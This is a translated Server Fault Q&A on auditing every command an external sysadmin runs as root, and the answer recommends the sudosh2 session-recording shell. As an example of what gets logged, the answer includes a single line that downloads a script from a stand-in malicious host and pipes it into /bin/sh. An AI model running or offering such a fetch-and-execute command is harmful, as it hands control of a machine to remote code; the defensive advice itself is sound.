Security

記錄從 root 執行的每個命令

  • May 1, 2012

我想將我的根伺服器的訪問權限授予外部系統管理員,但我想確保仔細檢查他對我的伺服器所做的事情,例如複製我不希望他們做的數據等等。我還想跟踪訪問的任何文件,即使是只讀且未編輯的。

我怎樣才能做到這一點?

信任但要驗證!

查看sudosh2。sudosh2 由 FreeBSD 埠提供。軟體包可用於 RedHat 和 Ubuntu。以下是他們網站上的描述:

sudosh 是一個審計外殼過濾器,可用作登錄外殼。Sudosh 記錄所有擊鍵和輸出,並且可以像 VCR 一樣回放會話。

Sudosh 將允許您重播使用者的會話,這將允許您查看使用者看到的所有輸入輸出。您會看到所有內容、擊鍵、拼寫錯誤、退格鍵、他們在 中編輯的內容vi、 的輸出wget -O- http://zyxzyxzyxzyx.ru/haxor/malware | /bin/sh等。

可以將 sudosh 日誌發送到 syslog,以便它們可以儲存在遠離系統的中央 syslog 伺服器上。

請注意,sudosh2 是 sudosh 的替代品,後者已被其作者拋棄

您是否在使用者堅持擁有超級使用者特權的學術機構工作?或者您是否在公司工作並希望允許使用者在他們自己的虛擬機上擁有超級使用者權限?這可能是您的解決方案。

引用自:https://serverfault.com/questions/378305